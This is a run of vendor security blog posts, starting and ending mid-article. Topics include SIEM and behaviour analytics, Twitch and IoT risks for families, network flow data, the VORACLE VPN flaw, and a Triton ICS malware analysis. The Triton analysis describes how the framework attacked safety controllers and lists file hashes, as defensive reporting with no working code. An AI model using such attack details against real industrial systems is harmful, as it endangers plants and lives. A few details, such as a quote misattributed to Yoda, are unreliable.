One year later, that security manager was looking for a job. Sure, the UBA package did a good job of telling him what his users were doing on the network, but it didn’t do a very good job of telling him about threats that didn’t involve abnormal behavior. I can only speculate about what triggered his departure, but my guess is it wasn’t pretty.

UBA hit the peak of the Gartner hype cycle last year around the same time as AI. The timing isn’t surprising given that many UBA vendors tout their use of machine learning to detect anomalies in log data. UBA is a good application of SIEM, but it isn’t a replacement for it. In fact, UBA is more accurately described as a cybersecurity application that rides on top of SIEM — but you wouldn’t know that the way it’s sometimes marketed.

User Behavior Analytics Versus Security Information and Event Management

While SIEM and UBA do have some similar features, they perform very different functions. Most SIEM offerings are essentially log management tools that help security operators make sense of a deluge of information. They are a necessary foundation for targeted analysis.

UBA is a set of algorithms that analyze log activity to spot abnormal behavior, such as repeated login attempts from a single IP address or large file downloads. Buried in gigabytes of data, these patterns are easy for humans to miss. UBA can help security teams combat insider threats, brute-force attacks, account takeovers and data loss.

UBA applications require data from an SIEM tool and may include basic log management features, but they aren’t a replacement for a general-purpose SIEM solution. In fact, if your SIEM system has anomaly detection capabilities or can identify whether user access activity matches typical behavior based on the user’s role, you may already have UBA.

Part of the confusion comes from the fact that, although SIEM has been around for a long time, there is no one set of standard features. Many systems are only capable of rule-based alerting or limited to canned rules. If you don’t have a rule for a new threat, you won’t be alerted to it.

Analytical applications such as UBA are intended to address certain types of cybersecurity threat detection and remediation. Choosing point applications without a unified log manager creates silos of data and taxes your security operations center (SOC), which is probably short-staffed to begin with. Many UBA solutions also require the use of software agents, which is something every IT organization would like to avoid.

Start With a Well-Rounded SIEM Solution

A robust, well-rounded SIEM solution should cross-correlate log data, threat intelligence feeds, geolocation coordinates, vulnerability scan data, and both internal and external user activity. When combined with rule-based alerts, an SIEM tool alone is sufficient for many organizations. Applications such as UBA can be added on top for more robust reporting.

Gartner’s latest “Market Guide for User and Entity Behavior Analytics” forecast significant disruption in the market. Noting that the technology is headed downward into Gartner’s “Trough of Disillusionment,” researchers explained that some pure-play UBA vendors “are now focusing their route to market strategy on embedding their core technology in other vendors’ more traditional security solutions.”

In my view, that’s where it belongs. User behavior analytics is a great technology for identifying insider threats, but that’s a use case, not a security platform. A robust SIEM tool gives you a great foundation for protection and options to grow as your needs demand.

The post Why User Behavior Analytics Is an Application, Not a Cybersecurity Platform appeared first on Security Intelligence.

What Parents Need to Know About Live-Stream Gaming Sites Like Twitch

Live-Stream GamingClash of Clans, Runescape, Fortnite, Counter Strike, Battlefield V, and Dota 2. While these titles may not mean much to those outside of the video gaming world, they are just a few of the wildly popular games thousands of players are live streaming to viewers worldwide this very minute. However, with all the endless hours of entertainment this cultural phenomenon offers tweens, teens, and even adults, it also comes with some risks attached.

The What

Each month more than 100,000 people log onto sites like Twitch and YouTube to watch gamers play. Streamers, also called twitchers, broadcast their gameplay live online while others watch and participate through a chat feature. Each gamer attracts an audience (a few dozen to hundreds of thousands daily) based on his or her skill level and the kind of commentary, and interaction with viewers they offer.

Reports state that video game streaming can attract more viewers than some of cable’s most popular televisions shows.

The Why

Ask any streamer (or viewer) why they do it, and many will tell you it’s to showcase and improve their skills and to be part of a community of people who are equally as passionate about gaming.

Live-Stream Gaming

Live streaming is also free and global so gamers from any country can connect in any language. You’ll find streamers playing games in Turkish, Russian, Spanish, and the list goes on. Many streamers have gone from amateurs to gaming celebrities with elaborate production and marketing of their Twitch or YouTube feeds.

Some streamers hold marathon streaming sessions, and multi-player competitions designed to benefit charities. Twitch is also appealing because it allows users to watch popular gaming conventions such as TwitchCon, E3, and Comic-Con. There are also live gaming talk shows and podcasts and a channel where users can watch people do everyday things like cook, create pieces or art or play music.

The Risks

Although Twitch’s community guidelines prohibit violent behavior, sexual content, bullying and harassment, after browsing through some of the  live games, many users don’t seem to take the guidelines seriously.

Here are just a few things to keep in mind if your kids frequent live streaming communities like Twitch.

  1. Bullying. Bullying happens on every social network in some form. Twitch is no different. In one study, over 13% of respondents said they felt personally attacked on Twitch, and more than 27% have witnessed racial or gender-based bullying in live streaming.Live-Stream Gaming
  2. Crude language. While there are streamers who put a big emphasis on keeping things clean, most Twitch streamers do not. Some streamers will put up a “mature content” warning before you click on their site. Both streamers and viewers can get harsh with language, conversations, and points of view.
  3. Violent games. Many of the games on Twitch are violent and intended for mature viewers. However, you can also find some more mild games such as Minecraft and Mario Brothers if your kids are younger. The best way to access a game’s violence is to sit and watch it with your child.
  4. Health risks. Sitting and playing video games for extended periods of time can affect players and viewers physical and emotional well-being. In the most extreme cases, gamers have died due to excessive gaming.
  5. Costs. Twitch is free to sign-up and watch games, but if you want the extras (no ads), it’s $8.99 a month. Viewers can also subscribe to individual gamers’ feed. Viewers can also purchase “bits” to cheer on their favorite players (kind of like badges), which can add up quickly.
  6. Stalking. Viewers have been known to stalk, harass, rob, and try to meet celebrity streamers. Recently, Twitch announced both private and public chat rooms to try to boost privacy among users.
  7. Live-Stream GamingSwatting. An increasingly popular practice called “swatting” involves reporting a fake emergency at the home of the victim in order to send a SWAT team to barge in on them. In some cases, swatter cases connected to Twitch have ended tragically.
  8. Wasted time. Marathon gaming sessions, skipping school to play or view games, and gaming through the night are common in Twitch communities. Twitch, like any other social network, needs parental attention and ground rules.
  9. Privacy. Spending a lot of time with people in an online “community” can result in a false sense of trust. Often kids will answer an innocent question in a live chat such as where they live or what school they go to. Leaking little bits of information over time allows a corrupt person to piece together a picture of your data.

An endnote: If your kids love Twitch or live stream gaming on YouTube or other sites, spend some time on those sites. Listen to the conversations your kids are having with others online. What’s the tone? Is there too much sarcasm or cruel “joking” going on? Put time limits on screen time and remember balance and monitoring is key to guiding healthy online habits.

 

Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her onTwitter @McAfee_Family. (Disclosures)

 

The post What Parents Need to Know About Live-Stream Gaming Sites Like Twitch appeared first on McAfee Blogs.

Why You Should Start Leveraging Network Flow Data Before the Next Big Breach

Organizations tend to end up in cybersecurity news because they failed to detect and/or contain a breach. Breaches are inevitable, but whether or not an organization ends up in the news depends on how quickly and effectively it can detect and respond to a cyber incident.

Beyond the fines, penalties and reputational damage associated with a breach, organizations should keep in mind that today’s adversaries represent a real, advanced and persistent threat. Once threat actors gain a foothold in your infrastructure or network, they will almost certainly try to maintain it.

To successfully protect their organizations, security teams need the full context of what is happening on their network. This means data from certain types of sources should be centrally collected and analyzed, with the goal of being able to extract and deliver actionable information.

What Is Network Flow Data?

One of the most crucial types of information to analyze is network flow data, which has unique properties that provide a solid foundation on which a security framework should be built. Network flow data is extracted — by a network device such as a router — from the sequence of packets observed within an interval between two internet protocol (IP) hosts. The data is then forwarded to a flow collector for analysis.

A unique flow is defined by the combination of the following seven key fields:

  1. Source IP address
  2. Destination IP address
  3. Source port number
  4. Destination port number
  5. Layer 3 protocol type
  6. Type of service (ToS)
  7. Input logical interface (router or switch interface)

If any one of the packet values for these fields is found to be unique, a new flow record is created. The depth of the extracted information depends on both the device that generates the flow records and the protocol used to export the information, such as NetFlow or IP Flow Information Export (IPFIX). Inspection of the traffic can be performed at different layers of the Open Systems Interconnection (OSI) model — from layer 2 (the data link layer) to layer 7 (the application layer). Each layer that is inspected adds more meaningful and actionable information for a security analyst.

One major difference between log event data and network flow data is that an event, which typically is a log entry, happens at a single point in time and can be altered. A network flow record, in contrast, describes a condition that has a life span, which can last minutes, hours or days, depending on the activities observed within a session, and cannot be altered. For example, a web GET request may pull down multiple files and images in less than a minute, but a user watching a movie on Netflix would have a session that lasts over an hour.

What Makes Network Flow Data So Valuable?

Let’s examine some of the aforementioned properties in greater detail.

Low Deployment Effort

Network flow data requires the least deployment effort because networks aggregate most of the traffic in a few transit points, such as the internet boundary, and the changes made to those transit points are not often prone to configuration mistakes.

Everything Is Connected

From a security perspective, we can assume that most of the devices used by organizations, if not all of them, operate on and interact with a network. Those devices can either be actively controlled by individuals — workstations, mobile devices, etc. — or operated autonomously — servers, security endpoints, etc.

Furthermore, threat actors typically try to remove traces of their attacks by manipulating security and access logs, but they cannot tamper with network flow data.

Reliable Visibility

The data relevant to security investigations is typically collected from two types of sources:

  • Logs from endpoints, servers and network devices, using either an agent or remote logging; or
  • Network flow data from the network infrastructure.

The issue with logs is that there will always be connected devices from which an organization cannot collect data. Even if security policies mandate that only approved devices may be connected to a network, being able to ensure that unmanaged devices or services have not been inserted into the network by a malicious user is crucial. Furthermore, history has shown that malicious users actively attempt to circumvent host agents and remote logging, making the log data from those hosts unreliable. The most direct source of information about unmanaged devices is the network.

Finally, network flow data is explicitly defined by the protocol, which changes very slowly. This is not the case with log data, where formats are very often poorly documented, tied to specific versions, not standardized and prone to more frequent changes.

Automatically Reduce False Positives

A firewall or access control list (ACL) permit notification does not mean that a successful communication actually took place. On the other hand, network flow data can be used to confirm that a successful communication took place. Being able to issue an alert unless a successful communication took place can dramatically reduce false positives and, therefore, save precious security analyst time.

Moving Beyond Traditional Network Data

Traditional network flow technology was originally designed to provide network administrators with the ability to monitor their network and pinpoint network congestion. More recently, security analysts discovered that network flow data was also useful to help them find network intrusions. However, basic network flow data was never designed to detect the most sophisticated advanced persistent threats (APTs). It does not provide the necessary in-depth visibility, such as the hash of a file transferred over a network or the detected application, as opposed to the port number, to name a few. By lacking this level of visibility, traditional network flow data greatly limits the ability to provide actionable information about a cyber incident.

Given the increasing level of sophistication of attacks, certain communications, such as inbound traffic from the internet, should be further scrutinized and inspected with a purpose-built solution. The solution must be able to perform detailed packet dissection and analysis — at line speed and in passive mode — and deliver extensive and enriched network flow data through a standard protocol such as IPFIX, which defines how to format and transfer IP flow data from an exporter to a collector.

The resulting enriched network flow data can be used to augment the prioritization of relevant alerts. Such data can also accelerate alert-handling research and resolution.

Why You Should Anaylze Network Flow Data?

Network flow data is a crystal ball into your environment because it delivers much-needed and immediate, in-depth visibility. It can also help security teams detect the most sophisticated attacks, which would otherwise be missed if investigation relied solely on log data. By reconciling network flow data with less-reliable log data, organizations can detect attacks more capably and conduct more thorough investigations. The bottom line is that network flow data can help organizations catch some of the most advanced attacks that exist, and it should not be ignored.

The post Why You Should Start Leveraging Network Flow Data Before the Next Big Breach appeared first on Security Intelligence.

Triton Malware Spearheads Latest Generation of Attacks on Industrial Systems

Malware that attacks industrial control systems (ICS), such as the Stuxnet campaign in 2010, is a serious threat. This class of cyber sabotage can spy on, disrupt, or destroy systems that manage large-scale industrial processes. An essential danger in this threat is that it moves from mere digital damage to risking human lives. In this post we will review the history of ICS malware, briefly examine how one ICS framework operates, and offer our advice on how to fight such threats.

ICS malware is usually sophisticated, requiring time to research its targets and sufficient resources. Attackers can be motivated by financial gain, hacktivism, or espionage, as well as for political ends, as we saw with Stuxnet. Since Stuxnet, researchers have discovered several industrial attacks; each year we seem to read about a worse threat than before.

In August 2017, a sophisticated malware targeted petrochemical facilities in the Middle East. The malware—dubbed Triton, Trisis, or HatMan—attacked safety instrumented systems (SIS), a critical component that has been designed to protect human life. The system targeted in that case was the Schneider Triconex SIS. The initial vector of infection is still unknown, but it was likely a phishing attack.

After gaining remote access, the Triton attackers moved to disrupt, take down, or destroy the industrial process. The goal of the attackers is still unclear because the attack was discovered after an accidental shutdown of the plant led to further investigation. Investigations conducted by several security companies have revealed a complex malware framework embedding PowerPC shellcode (the Triconex architecture) and an implementation of the proprietary communication protocol TriStation. The malware allowed the attackers to easily communicate with safety controllers and remotely manipulate system memory to inject shellcodes; they completely controlled the target. However, because the attack did not succeed it is possible that a payload, the final stage of the attack, was missing. All investigations pointed in this direction. If the final payload had been delivered, the consequences could have been disastrous.

History of ICS malware

In 2010, Stuxnet was one of the most sophisticated ICS threats discovered. This cyber weapon was created to target Iranian centrifuges. It was able to reprogram a particular programmable logic controller to change the speed of centrifuge rotations. The goal of Stuxnet was not to destroy but to take the control of the industrial process.

In 2013, the malware Havex targeted energy grids, electricity firms, and many others. The attackers collected a large amount of data and remotely monitored industrial systems. Havex was created for espionage and sabotage.

BlackEnergy was discovered in 2015. It targeted critical infrastructure and destroyed files stored on workstations and servers. In Ukraine, 230,000 people were left in the dark for six hours after hackers compromised several power distribution centers.

In 2015, IronGate was discovered on public sources. It targeted Siemens control systems and had functionalities similar to Stuxnet’s. It is unclear if this was a proof of concept or a simple penetration-testing tool.

Industroyer hit Ukraine again in 2016. The malware embedded a data wiper component as well as a distributed denial of services module. It was crafted for destruction. The attack caused a second shutdown of Ukraine’s power grid.

In 2017, Triton was discovered. The attack did not succeed; the consequences could have been disastrous.

ICS malware are critical because they infect industrial devices and automation. However, regular malware can also impact industrial process. Last year WannaCry forced several companies, from medical to automobile industries, to stop production. Some months later NotPetya hit nuclear power plants, power grids, and health care systems. In 2018, a cryptocurrency miner struck a water utility in Europe.

Facing widespread risks, critical infrastructures need a specific approach to stay safe.

Triton framework

Triton targeted the Triconex safety controller, distributed by Schneider Electric. Triconex safety controllers are used in 18,000 plants (nuclear, oil and gas refineries, chemical plants, etc.), according to the company. Attacks on SIS require a high level of process comprehension (by analyzing acquired documents, diagrams, device configurations, and network traffic). SIS are the last protection against a physical incident.

The attackers gained access to the network probably via spear phishing, according to an investigation. After the initial infection, the attackers moved onto the main network to reach the ICS network and target SIS controllers.

To communicate with SIS controllers, attackers recoded the proprietary TriStation communication protocol on port UDP/1502. This step suggests they invested the time to reverse engineer the Triconex product.

Nozomi Networks has created a Wireshark dissector that is very handy for analyzing the TriStation protocol and detecting a Triton attack. The following screenshot shows an example of the information returned by the Triconex SIS. Triton requires the “running state” of the controller to perform the next stages of the attack.

In the preceding screen Triconex replies to the request “Get Control Program Status,” which is sent by Triton.

The Triton framework (dc81f383624955e0c0441734f9f1dabfe03f373c) posed as the legitimate executable trilog.exe, which collects logs. The executable is a python script compiled in an exe. The framework also contains library.zip (1dd89871c4f8eca7a42642bf4c5ec2aa7688fd5c), which contains all the python scripts required by Triton. Finally, two PowerPC shellcodes (the target architecture) are used to compromise the controllers. The first PowerPC shellcode is an injector (inject.bin, f403292f6cb315c84f84f6c51490e2e8cd03c686) used to inject the second stage (imain.bin, b47ad4840089247b058121e95732beb82e6311d0), the backdoor that allows read, write, and execute access on the Triconex product.

The following schema shows the main modules of Triton:

The missing payload has not been recovered during the forensic investigation. Because the attack was discovered early, it is possible that the attackers did not have time to launch the final stage.

How to detect an unusual network connection

Nozomi Networks has created a script that simulates a Triconex safety controller. We modified this script with a Raspberry Pi to create a cheap detector tool.

 

This inexpensive tool can be easily installed on an ICS network. If an illegitimate connection occurs, the device alerts with a blinking LED and siren. It also displays the IP address of the connection for further investigation.

The following picture shows how to connect the LED and buzzer.

Fighting ICS malware

ICS malware has become more aggressive and sophisticated. Many industrial devices were built before anyone imagined cyberattacks such as Triton. ICS’s are now exposed to connected environments they were not designed for.

Standard McAfee security recommendations (vulnerability patching, complex passwords, identification control, security tools, etc.) remain the same as for regular networks, yet industrial systems also require specific procedures due to their importance. Industrial networks must be segregated from general business networks, and every machine connected to the industrial process should be carefully monitored by using strict access control and application whitelisting.

Further security recommendations:

  • Segregate physical and logical access to ICS networks with strong authentication, including strong passwords and double factor, card readers, surveillance cameras, etc.
  • Use DMZ and firewall to prevent network traffic from passing between the corporate and the ICS network
  • Deploy strong security measures on the ICS network perimeter, including patch management, disabling unused ports, and restricting ICS user privileges
  • Log and monitor every action on the ICS network to quickly identify a point of failure
  • When possible implement redundancy on critical devices to avoid major issues
  • Develop strong security policies and an incident response plan to restore systems during an incident
  • Train people with simulated incident responses and security awareness

Attackers learn what works from past attacks and from each other. Rapid developments in ICS threats make it crucial to stay protected. Manufacturers, plant operators, governments, and the cybersecurity industry must work together to avoid critical cyberattacks.

 

Indicators of compromise

  • dc81f383624955e0c0441734f9f1dabfe03f373c: trilog.exe
  • b47ad4840089247b058121e95732beb82e6311d0: imain.bin
  • f403292f6cb315c84f84f6c51490e2e8cd03c686: inject.bin
  • 91bad86388c68f34d9a2db644f7a1e6ffd58a449: script_test.py
  • 1dd89871c4f8eca7a42642bf4c5ec2aa7688fd5c: library.zip
  • 97e785e92b416638c3a584ffbfce9f8f0434a5fd: TS_cnames.pyc
  • d6e997a4b6a54d1aeedb646731f3b0893aee4b82: TsBase.pyc
  • 66d39af5d61507cf7ea29e4b213f8d7dc9598bed: TsHi.pyc
  • a6357a8792e68b05690a9736bc3051cba4b43227: TsLow.pyc
  • 2262362200aa28b0eead1348cb6fda3b6c83ae01: crc.pyc
  • 9059bba0d640e7eeeb34099711ff960e8fbae655: repr.pyc
  • 6c09fec42e77054ee558ec352a7cd7bd5c5ba1b0: select.pyc
  • 25dd6785b941ffe6085dd5b4dbded37e1077e222: sh.pyc

References

 

The post Triton Malware Spearheads Latest Generation of Attacks on Industrial Systems appeared first on McAfee Blogs.

Complexity is the Worst Enemy of Security, Time for a New Approach with Network Security?

Bruce Schneier summed it up best in 1999 when he said "Complexity is the Worst Enemy of Security" in an essay titled A Plea for Simplicity, correctly predicting the cybersecurity problems we encounter today.

The IT industry has gone through lots of changes over the past few years, yet when it comes to cybersecurity, the mindset has remained the same. The current thinking around cybersecurity falls into the definition of insanity, with many organisations doing the same thing over and over again, expecting different results, and are then shocked when their company is the latest to hit the hacking headlines.

The current security model is broken and is currently too complex. As Paul German, CEO, Certes Networks, argues, it’s time to strip network security back and focus on the data. 

What should Organisations Really be Protecting?
Ultimately, by overcomplicating network security for far too long, the industry has failed - which won’t come as a surprise to many. We’ve all learned the lessons from the high profile data breaches such as Dixon’s Carphone and historical breaches like Ticketmaster or Target; what they succeeded in showing us was that current attempts to secure corporate networks are just not enough. And the reason for this? Quite simply, it’s because organisations are trying to protect something they no longer own. For a long time, security thinking has focused purely on the network, honing in on the insecurity of the network and trying to build up network defences to protect the data that runs over it in order to combat the challenges.

Yet, this way of thinking still leaves a problem untouched: we don’t always own the networks over which our data runs, so therefore focusing on this aspects is leaving many other doors wide open. The corporate network used to remain in the data centre, but in the digital economy present today, the corporate network spans over corporate locations worldwide, including data centres, private clouds and public clouds. Additionally, this data is not just shared with employees, but to third parties whose devices and policies cannot be easily controlled. Add legacy security measures into the mix which simply weren’t constructed to address the complexity and diversity of today’s corporate network, and it is extremely apparent why this is no longer enough.

So, what needs to change? First and foremost, the industry needs to take a step in the right direction and put data at the forefront of security strategies.

The Security Mindset Needs to Change - and It Needs to Change Now
In an attempt to keep their data and infrastructure secure, organisations have layered technology on top of technology. As a result of this, not only has the technology stack itself become far too complicated but the number of resources, operational overhead and cost needed to manage it have only contributed to the failing security mindset.

Anyone in the IT industry should be able to acknowledge that something needs to change. The good news is that the change is simple. Organisations need to start with a security overlay that covers the networks, independent of the infrastructure, rather than taking the conventional approach of building the strategy around the infrastructure. The network itself must become irrelevant, which will then encourage a natural simplicity in approach.

As well as enabling organisations to better secure their data, this approach also has economic and commercial benefits. Taking intelligence out of the network allows organisations to focus it on its core task: managing traffic. In turn, money and resources can be saved and then better invested in a true security model with data protection at its heart.

A New Era of Cybersecurity
To begin this mindset change, organisations need to start thinking about security as an overlay on top of existing infrastructure. They also need to introduce a software-defined approach to data security, enabling a centralised orchestration of security policy. This centralised orchestration enforcing capabilities such as software-defined application access control, cryptographic segmentation, data-in-motion privacy and a software-defined perimeter, data is completely protected on its journey across any network, while hackers are restricted from moving laterally across the network once a breach has occurred. Additionally, adopting innovative approaches such as Layer 4 encryption which renders the data itself useless, and therefore worthless to hackers, without impacting the operational visibility of the enterprise network and data flows, will further ensure the protection of the organisation’s network.

The fact is that the industry has overcomplicated network security for too long. If the industry continues to try the same methods over and over again, without making any changes, then there is no chance of progression. It’s time for organisations to start afresh and adopt a new, simple software-defined security overlay approach. 

IoT Lockdown: Ways to Secure Your Family’s Digital Home and Lifestyle

Internet Of ThingsIf you took an inventory of your digital possessions chances are, most of your life — everything from phones to toys, to wearables, to appliances — has wholly transitioned from analog to digital (rotary to wireless). What you may not realize is that with this dramatic transition, comes a fair amount of risk.

Privacy for Progress

With this massive tech migration, an invisible exchange has happened: Privacy for progress. Here we are intentionally and happily immersed in the Internet of Things (IoT). IoT is defined as everyday objects with computing devices embedded in them that can send and receive data over the internet.

That’s right. Your favorite fitness tracking app may be collecting and giving away personal data. That smart toy, baby device, or video game may be monitoring your child’s behavior and gathering information to influence future purchases. And, that smart coffee maker may be transmitting more than just good morning vibes.

Gartner report estimated there were 8.4 billion connected “things” in 2017 and as many as 20 billion by 2020. The ability of some IoT devices is staggering and, frankly, a bit frightening. Data collection ability from smart devices and services on the market is far greater than most of us realize. Rooms, devices, and apps come equipped with sensors and controls that can gather and inform third parties about consumers.

Internet Of Things

Lockdown IoT devices:

  • Research product security. With so many cool products on the market, it’s easy to be impulsive and skip your research but don’t. Read reviews on a product’s security (or lack of). Going with a name brand that has a proven security track record and has worked out security gaps may be the better choice.
  • Create new passwords. Most every IoT device will come with a factory default password. Hackers know these passwords and will use them to break into your devices and gain access to your data. Take the time to go into the product settings (general and advanced) and create a unique, strong password.
  • Keep product software up-to-date. Manufacturers often release software updates to protect customers against vulnerabilities and new threats. Set your device to auto-update, if possible, so you always have the latest, safest upgrade.
  • Get an extra layer of security. Managing and protecting multiple devices in our already busy lives is not an easy task. To make sure you are protected consider investing in software that will give you antivirus, identity and privacy protection for your PCs, Macs, smartphones, and tablets—all in one subscription.
  • Stay informed. Think about it, crooks make it a point to stay current on IoT news, so shouldn’t we? Stay a step ahead by staying informed. Keep an eye out for any news that may affect your IoT security (or specific products) by setting up a Google alert.Internet Of Things

A connected life is a good life, no doubt. The only drawback is that criminals fully understand our growing dependence and affection for IoT devices and spend most of their time looking for vulnerabilities. Once they crack our network from one angle, they can and reach other data-rich devices and possibly access private and financial data.

As Yoda says, “with much power comes much responsibility.” Discuss with your family the risks that come with smart devices and how to work together to lock down your always-evolving, hyper-connected way of life.

Do you enjoy podcasts and wish you could find one that helps you keep up with digital trends and the latest gadgets? Then give McAfee’s podcast Hackable a try.

 

Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her onTwitter @McAfee_Family. (Disclosures)

 

The post IoT Lockdown: Ways to Secure Your Family’s Digital Home and Lifestyle appeared first on McAfee Blogs.

Have You Talked to Your Kids About a Career in Cybersecurity?

career in cybersecurityHere’s some cool trivia for you: What profession currently has a zero-percent unemployment rate, pays an average of $116,000 a year, and is among the top in-demand jobs in the world? A lawyer? A pharmacist? A finance manager, perhaps?

Nope. The job we’re talking about is a cybersecurity specialist and, because of the increase in cyber attacks around the world, these professionals are highly employable.

Job Security

According to numbers from the Bureau of Labor and Statistics, a career in cybersecurity is one of the most in-demand, high-paying professions today with an average salary of $116,000, or approximately $55.77 per hour. That’s nearly three times the national median income for full-time wage and salary workers. How’s that for job security?

Why is the demand so high? Sadly, because there are a lot of black hats (bad guys) out there who want our data — our user IDs, passwords, social security numbers, and credit card numbers. Every month it seems banks, hospitals, and major corporations are reporting security breaches, which has put the global cybersecurity talent an estimated deficit of two million professionals.career in cybersecurity

It’s exciting to see gifts and passions emerge in our kids as they grow and mature. If a child is good at math and sciences, we might point them toward some the medical field. If they a child shows an affinity in English and communication skills, maybe a law, teaching, or media career is in their future.

But what about a cybersecurity expert? Have you noticed any of these skills in your kids?

Cybersecurity skills/traits:

Problem-solving
Critical thinking
Flexible/creative problem solving
Collaborative, team player
Continual learner
Gaming fan
A sense of duty, justice
Persistent, determined
Works well under pressure
Curious and perceptive
Technology/tech trend fan
Verbal and written communications

Education

Most jobs in cybersecurity require a four-year bachelor’s degree in cybersecurity or a related field such as information technology or computer science. Students take coursework in programming and statistics, ethics, and computer forensics, among other courses.

Conversation Starters

First, if your child has some of the skills/personality traits mentioned, how do you start directing him or her toward this field? The first place to begin is in the home. Model smart cybersecurity habits. Talk about digital safety, the importance of protecting personal data and the trends in cybercrimes. In short, model and encourage solid digital citizenship and family security practices. career in cybersecurity

Second, bring up the possibility, or plant the seed. Be sure to encourage both boys and girls equally. Help your child find answers to his or her questions about careers in computer and data science, threat research, engineering and information on jobs such as cybersecurity analyst, vulnerability analyst, and penetration tester.

Third, read and share takeaways from the Winning The Game a McAfee report that investigates the key challenges facing the IT Security industry and the possible teen gaming link to a successful cybersecurity career.

Additional resources*

CyberCompEx. A connection point for everything cybersecurity including forums, groups, news, jobs, and competition information.

CyberCorps® Scholarship for Service. SFS is a program providing scholarships and stipends to undergraduate and graduate students studying cybersecurity at participating institutions. Great for those who want to work in government.

CyberPatriot. This site is created by the Air Force Association (AFA) to inspire K-12 students toward careers in cybersecurity or other science, technology, engineering, and mathematics (STEM).

GenCyber. This is a summer cybersecurity camp for K-12 students and teachers that focuses on inspiring kids to direct their talents toward cybersecurity skills and closing the security skills gap.

career in cybersecurityNational CyberWatch Center. The National CyberWatch Center is a consortium of higher education institutions, public and private businesses, and government agencies focused on advancing cybersecurity education and strengthening the workforce.

National Initiative for Cybersecurity Careers and Studies. NICCS provides information on cybersecurity training, formal education, and workforce development.

National Initiative for Cybersecurity Education. NICE is an initiative to energize and promote a robust network and an ecosystem of cybersecurity education, cybersecurity careers, training, and workforce development.

*Resource list courtesy of Stay Safe Online.

 

Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her onTwitter @McAfee_Family. (Disclosures)

The post Have You Talked to Your Kids About a Career in Cybersecurity? appeared first on McAfee Blogs.

The VORACLE OpenVPN Attack: What You Need to Know

Many of us know that using a VPN (Virtual Private Network) adds an extra layer of security to our Wi-Fi networks. But VORACLE, a recently discovered vulnerability that was announced at a security conference by security researcher Ahamad Nafeez, is making some people reconsider this this steadfast safety tip. Let’s look under the hood at this vulnerability to understand what was impacted and why, and what we should do in the future when it comes to safely connecting to Wi-Fi.

Under the Hood of a VPN

A VPN is a connection between a secure server and your mobile device or computer. Through the VPN your activity and information on the internet is encrypted, making it difficult for anyone else to see your private information. Many of us use a VPN for work when we travel, some of us use them to watch videos online, and more and more of us use them as a best practice to help keep our information safe any time we want to use a Wi-Fi connection that we’re not sure about.

About the VORACLE VPN Vulnerability

At a high level, VORACLE leverages a vulnerability found in the open-source OpenVPN protocol. OpenVPN is an open-source protocol used by the majority of VPN providers, meaning many VPN products are affected.

The VORACLE attack can recover HTTP traffic sent via encrypted VPN connections under certain conditions, the first being that the VPN app in use enables compression via the OpenVPN protocol. A  hacker must be on the same network and able to lure you to an HTTP (not HTTPS) site with malicious code through phishing or a similar other tactic. The attack can happen on all web browsers but Google Chrome, due to the way in which HTTP requests are made.

Luckily the McAfee Safe Connect VPN was not built on the vulnerable OpenVPN code. That said, I want to take this opportunity to remind you of something we talk about a lot in the security industry: relying on only one layer of security is simply not enough today. Here are some tips and best practices to stay safe.

  • Set up multi-factor authentication whenever possible. This tip is especially important for valuable accounts like email or social media, which might be connected to financial information. With multi-factor authentication in place, you’ll be better protected by combining your usual login information with another layer of protection, such as a one-time-password sent to your phone, bio metrics (say, a thumb print), or a security token that you’ll need to confirm before getting access to your account.
  • Use secure websites (HTTPS) whenever possible. The ‘S’ at the end of HTTPS stands for ‘Secure’. It means all communications between your browser and the website are encrypted. Most websites are moving toward this standard practice, so if you notice yourself landing on a website with just HTTP, stay alert.
  • Avoid making financial transactions until you’re on a network you trust. Sharing personal data like your credit card information can lead to unnecessary vulnerabilities. The best bet is to wait until you’re on your home network with additional layers of security such as McAfee’s Secure Home Platform already in place.
  • Consider using your mobile network and being your own hotspot. If your mobile or IoT data plan includes a hot spot, consider using that over Wi-Fi to avoid some of the challenges that come with it in the first place.
  • Do continue to use a personal VPN when you’re on the go and using Wi-Fi– just be sure to do so while having an additional layer of security in place so that if a similar vulnerability is discovered, you’ll already have a backup.

Looking for more mobile security tips and trends? Be sure to follow @McAfee_Home on Twitter, and like us on Facebook.

The post The VORACLE OpenVPN Attack: What You Need to Know appeared first on McAfee Blogs.

5 Reasons Why Strong Digital Parenting Matters More than Ever

digital parentingAs a parent raising kids in a digital culture, it’s easy to feel at times as if you have a tiger by the tail and that technology is leading your family rather than the other way around.

But that familiar feeling — the feeling of being overwhelmed, outsmarted, and always a step or two behind the tech curve — is just a feeling, it’s not a fact.

Digital Parenting Matters

The fact is, you are the parent. That is a position of authority, honor, and privilege in your child’s life. No other person (device, app, or friend group) can take your place. No other voice is more influential or audible in your child’s mind and heart than yours.

It’s true that technology has added several critical skills to our parenting job description. It’s true that screens have become an integral part of daily life and that digital conversation can now shape our child’s self-image and perspective of his or her place in the world. All of this digital dominance has made issues such as mental health, anxiety, and cyberbullying significant concerns for parents.digital parenting

What’s also true is that we still have a lot of control over our kids’ screen time and the role technology plays in our families. Whether we choose to exercise that influence, is up to us but the choice remains ours.

Here are just a few reasons why strong digital parenting matters more than ever. And, some practical tools to help you take back any of the influence you feel you may have lost in your child’s life.

5 Digital Skills to Teach to Your Kids

Resilience

According to the American Psychological Association, resilience building is the ability to adapt well to adversity, trauma, tragedy, threats or even significant sources of stress. Resilience isn’t something you are born with. Kids become resilient over time and more so with an intentional parent. Being subject to the digital spotlight each day is a road no child should have to walk alone. September is National Suicide Prevention Month and an excellent opportunity to talk to your kids about resilience building. Digital Parenting Skills: Helping kids understand concepts like conflict-management, self-awareness, self-management, and responsible decision-making, is one of the most critical areas of parenting today. Start the conversations, highlight examples of resilience in everyday life, model resilence, and keep this critical conversation going.

Empathy

digital parentingEmpathy is the ability to understand and share the feelings of another person. Unfortunately, in the online space, empathy isn’t always abundant, so it’s up to parents to introduce, model, and teach this character trait. Digital Parenting Skills: According to Dr. Michele Borba, author of #UnSelfie: Why Empathetic Kids Succeed in Our All-About-Me World, there are 9 empathy-building habits parents can nurture in their kids including Emotional Literacy, Moral Identity, Perspective Taking, Moral Imagination, Self Regulation, Practicing Kindness, Collaboration, Moral Courage, and Altruistic Leadership Abilities.

Life Balance

